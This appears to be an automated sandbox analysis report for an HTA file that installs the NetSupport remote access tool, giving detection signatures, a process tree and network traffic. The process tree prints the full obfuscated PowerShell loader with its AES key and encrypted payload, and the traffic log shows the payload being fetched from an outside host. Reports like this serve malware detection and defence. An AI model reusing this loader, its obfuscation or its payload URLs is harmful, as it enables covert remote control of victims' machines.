Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Client_version(updater).hta

Overview

General Information

Sample Name:Client_version(updater).hta
Analysis ID:1305463
MD5:f306968c85745ca275dd343997ce4556
SHA1:eb6245329bb41e4ef5bf4d478166cadb4229c97f
SHA256:c43490f373bf32401ffe2d9355865db093fd9b1393f9732a8a5827e5fc0c4fe7
Tags:FakeSGhta
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Very long command line found
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Enables security privileges
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • mshta.exe (PID: 7016 cmdline: mshta.exe "C:\Users\user\Desktop\Client_version(updater).hta" MD5: 7083239CE743FDB68DFC933B7308E80A)
    • powershell.exe (PID: 5372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - } MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6652 cmdline: "C:\Windows\system32\cmd.exe" /c powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto | powershell - MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5596 cmdline: powershell.exe $cwWl = 'AAAAAAAAAAAAAAAAAAAAACgw0kTXfDt7VyGQWkvUWZWoRWwQ3foR84LKr0hIDBn55hU2P/QaH7UkicLpJA/xSJe84nJJo6jId61fi3om68eOCGqV7+xcDPABW0JXS0BNLSJCDSQlWtLiZ1E8R3S8ajj1PUmqy7WW9uT2VoNU9+010dg1zxZzgrNA/hcsUz5YVLblgbKewS5UQz7KSXbyb+CIClfTCOKLkZz7/MgCao3wN7ZeZ9Gb0u7SLIy7/xgnQsB0l3y8s69ruJDDmpYRh/RzGp2gf/qgjHb69/JjuK79SBgoIiM5oVSJ9CpWdthdRf2P9XkKGkXCBzJk9SV8CqUOLVMO0s3WHoiyqMsy+pqxJ4e/1jontj7rpiNv74j3Axt+r8La7T/hMWUnuxUgJbbnYl3FdW8s+G5JNU2lt2QBmjnyCxdZEhHS37qR0lcaXLNh7PQHbDGNYuMxnA6GJlxD0f87eY0FNf6zB/eR50WXPe/DXv/2VOm4h7EONAY3PyeLB6cFgk5v+vcMZz1G3FHk+oD59x4TIQ/jSbjrv1tBgAK4PwwUkiat07QTB8NB6LWM7kzWo7HjPZyGY+DvUE1B5PoEFLx54pWq3feDtfCTSpTbRyLKDvK0nXyFp/G/PV523VBKf67xcBp4jYYN0tRKraOrZoUhErSuWwHHbgshkWMXIc+l1PJDcozYEeFSzmwlBM2jFbwg0yMOkBZG4tcB0WxvMT2cmatL9Cem3kfSU75JXtNn4spkMmxgPemj2lDy7zR1O9HP6kBKK+BjI3gFMb9Ry8Y1XwIVbuRW2UYypeCbXN38X9tvobSoJuBZQSe9Wj2TyHbRMHmbRLqU/tOvc/zQFUwqWAJ35WKeKei0PA4ioeHdhfZUxES8DjE0qSOJ3xNCxb/CQtf5HWEiLOpuXHlrHfEvyvBv0bYdrLzqZGBt9Wnyyl/ULpYqA5jNbUblmlaCeQgfQqpN9JaEIILd/WRa2PZ15h459LGu0en5qVzPNFtLZA+WkpfbXVyyXlcop8wApuAZTYj70NHYqkevtwO9/5jrAew4VqzCHOg2AAORrYEcnIOYJ+VnQVArdafr/6JOJiUGDfpzqL8agehMghJttIKhbaTtw3JXM42ZXYlE11kZt5PK56YJ3z/5o6URS7i1TdNR5oycuY5kMyjfU4f53FC65Md/65hgrRKTGDjWaUCKRazVMpLHSrOMk4x6nKQCn/LspzRVHtBWxfpvfq8kSxAP1WfuQDn8GZ0z4sbAPyZDZPtsS35qdlMo7wjJPr5H/lrd0Em7GMqWijrCpuf5OnwZEHFaM9MaFLOUAynybcJEor/t4xmDSIhKEzXjSR6X6wRkzE3Ph08iwneJLkiTHUjABGexMKq8XZtQJNPi3oecXcDMsJl9hR3dnSX8d2uijZ15EyeLG8esgN9njz3GNN6i6AOa8nXIKVLOTJ5fW1Lq6sI93oVUmTWNrqlO++5wKQe7PyfDzXcbF7x5vIGs0+MvugezqSEJInVTYjx6gcEKW6bnJq0n5pZU62ZO37pXLEodb7pM4qJ+5gTI1GMy0n94xqmVlTWhenE=';$osjnGw = 'RVJyQ3FGSFZXTUVhcnp3S2ZYcFp2VHh0RXFUdmJYWHU=';$HYoyNbe = New-Object 'System.Security.Cryptography.AesManaged';$HYoyNbe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HYoyNbe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HYoyNbe.BlockSize = 128;$HYoyNbe.KeySize = 256;$HYoyNbe.Key = [System.Convert]::FromBase64String($osjnGw);$MojFO = [System.Convert]::FromBase64String($cwWl);$QfSOiZVu = $MojFO[0..15];$HYoyNbe.IV = $QfSOiZVu;$vcdTgJDLO = $HYoyNbe.CreateDecryptor();$kQWgqYwUt = $vcdTgJDLO.TransformFinalBlock($MojFO, 16, $MojFO.Length - 16);$HYoyNbe.Dispose();$EnAuWBr = New-Object System.IO.MemoryStream( , $kQWgqYwUt );$sQFTam = New-Object System.IO.MemoryStream;$sHlBzafiX = New-Object System.IO.Compression.GzipStream $EnAuWBr, ([IO.Compression.CompressionMode]::Decompress);$sHlBzafiX.CopyTo( $sQFTam );$sHlBzafiX.Close();$EnAuWBr.Close();[byte[]] $DNZNxE = $sQFTam.ToArray();$xZHVto = [System.Text.Encoding]::UTF8.GetString($DNZNxE);$xZHVto MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • powershell.exe (PID: 7088 cmdline: powershell - MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • client32.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\MediaContent\client32.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • client32.exe (PID: 8180 cmdline: C:\Users\user\AppData\Roaming\MediaContent\client32.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\MediaContent\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\MediaContent\remcmdstub.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\MediaContent\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000016.00000000.323306200.0000000001232000.00000002.00000001.01000000.00000012.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000016.00000002.325285064.0000000001232000.00000002.00000001.01000000.00000012.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000015.00000000.320629163.0000000001232000.00000002.00000001.01000000.00000012.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 13 entries
                      SourceRuleDescriptionAuthorStrings
                      22.0.client32.exe.1230000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        21.0.client32.exe.1230000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          21.2.client32.exe.6c230000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            21.2.client32.exe.6e420000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              21.2.client32.exe.1230000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 12 entries
                                SourceRuleDescriptionAuthorStrings
                                amsi32_7088.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                • 0x80:$b1: ::WriteAllBytes(
                                • 0xb384:$s1: -join
                                • 0x4b30:$s4: +=
                                • 0x4bf2:$s4: +=
                                • 0x8e19:$s4: +=
                                • 0xaf36:$s4: +=
                                • 0xb220:$s4: +=
                                • 0xb366:$s4: +=
                                • 0x105d5:$s4: +=
                                • 0x106d9:$s4: +=
                                • 0x13b1e:$s4: +=
                                • 0x141fe:$s4: +=
                                • 0x146b4:$s4: +=
                                • 0x14709:$s4: +=
                                • 0x1497d:$s4: +=
                                • 0x149ac:$s4: +=
                                • 0x14ef4:$s4: +=
                                • 0x14f23:$s4: +=
                                • 0x15002:$s4: +=
                                • 0x17299:$s4: +=
                                • 0x175fb:$s4: +=

                                Remote Access Functionality

                                barindex
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7088, TargetFilename: C:\Users\user\AppData\Roaming\MediaContent\NSM.LIC
                                No Snort rule has matched

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: Client_version(updater).htaReversingLabs: Detection: 18%
                                Source: http://pesterbdd.com/images/Pester.pngPIAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Roaming\MediaContent\client32.exe (copy)ReversingLabs: Detection: 28%
                                Source: C:\Users\user\AppData\Roaming\client32.exeReversingLabs: Detection: 28%
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MediaContent\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 162.215.249.83:443 -> 192.168.2.6:49722 version: TLS 1.2
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, 00000015.00000002.519812691.000000006C171000.00000020.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000015.00000002.520311808.000000006E422000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: client32.exe, 00000015.00000000.320629163.0000000001232000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.520137464.000000006C235000.00000002.00000001.01000000.00000015.sdmp
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/MediaContent.zip HTTP/1.1Host: www.advisingdealers.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/01/client32.exe HTTP/1.1Host: www.advisingdealers.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 07 Sep 2023 16:19:42 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 07 Sep 2023 16:19:42 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 07 Sep 2023 16:19:43 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.51
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.51
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.252.178.51
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: powershell.exe, 00000002.00000002.271947909.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.279161796.0000000008320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: client32.exe, 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com
